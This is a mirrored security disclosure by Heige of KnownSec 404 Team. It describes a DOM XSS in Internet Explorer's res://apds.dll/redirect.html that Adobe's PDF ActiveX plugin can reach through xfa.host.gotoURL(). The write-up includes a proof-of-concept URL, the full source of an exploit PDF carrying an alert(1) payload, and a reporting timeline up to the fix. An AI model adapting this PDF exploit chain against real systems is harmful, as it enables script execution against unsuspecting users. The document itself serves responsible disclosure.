Self XSS using IE adobes
quality 7/10 · good
0 net
AI Summary
A DOM XSS vulnerability in Adobe's PDF ActiveX plugin (res://apds.dll/redirect.html) can be exploited via IE by using the xfa.host.gotoURL() function to bypass same-origin policy restrictions and execute arbitrary JavaScript without security warnings. The vulnerability chains a parameter injection flaw with Adobe's insecure URL redirect handling to achieve cross-domain XSS.
Tags
Entities
CVE-2019-8160
APSB19-49
Adobe PSIRT
MSRC
KnownSec 404 Team
Heige
apds.dll
From http:// domain to res:// domain xss by using IE Adobe's PDF ActiveX plugin | by heige - Freedium
Milestone: 20GB Reached
We’ve reached 20GB of stored data — thank you for helping us grow!
Patreon
Ko-fi
Liberapay
Close
< Go to the original
From http:// domain to res:// domain xss by using IE Adobe's PDF ActiveX plugin
by Heige(a.k.a Superhei) of KnownSec 404 Team 03/19/2019
heige
Follow
~2 min read
·
March 19, 2019 (Updated: December 8, 2021)
·
Free: Yes
[Article release: https://paper.seebug.org/860/ ]
1 res://apds.dll/redirect.html dom xss
https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html. And this vulnerability has not been fixed until now.
this vulnerability is a typical dom xss vulnerability form the res://apds.dll/redirect.html code:
POC:
res://apds.dll/redirect.html?target=javascript:alert(1)
2 from http:// domain to res:// domain
Usually accessing res:// resources via http:// domain is not allowed. The Javascript function xfa.host.gotoURL() in Adobe PDF can access multiple URLs include http(s):// file:// etc. Of course, in general, there will be security tips when you open the PDF files.
But when we use xfa.host.gotoURL() to access res:// or http(s):// by IE Adobe's PDF ActiveX plugin :
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
there are no security alerts. and the xss payload "alert(1)" is executed.
POC: http://xxxxxxx/r.pdf
r.pdf code:
%PDF-1.4
1 0 obj
<<>>
%endobj
2 0 obj <<>>
stream
1
endstream
endobj
trailer
<<
/Root
<<
/Pages <<>>
/AcroForm
<<
/XFA 2 0 R
>>
/OpenAction
<<
/S/JavaScript
/JS(
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
)
>>
>>
>>
demo tweet https://twitter.com/80vul/status/1048576146835558400
3 fixed?
Due to some security domain isolation of IE, the harm of res:// domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html xss vulnerability, and Adobe should disable or give corresponding security warnings when URL redirect,The world can be more beautiful and harmonious!
4 Timeline
October 04, 2018 Report it to Adobe PSIRT and MSRC
October 05, 2018 Adobe tracking number PSIRT-8981.
October 09, 2018 MSRC Case 47932 CRM:0461065793
October 18, 2018 Adobe PSIRT has been investigating and still
November 21, 2018 MSRC have completed our investigation and determined that the case doesn't meet the bar for immediate servicing in a security update.
March 19, 2019 Public
October 15,2019 Adobe fix it in the APSB19–49 (CVE-2019–8160) https://helpx.adobe.com/security/products/acrobat/apsb19-49.html
#javascript #xss-attack #knownsec
Reporting a Problem
Sometimes we have problems displaying some Medium posts.
If you have a problem that some images aren't loading - try using VPN. Probably you have problem with
access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).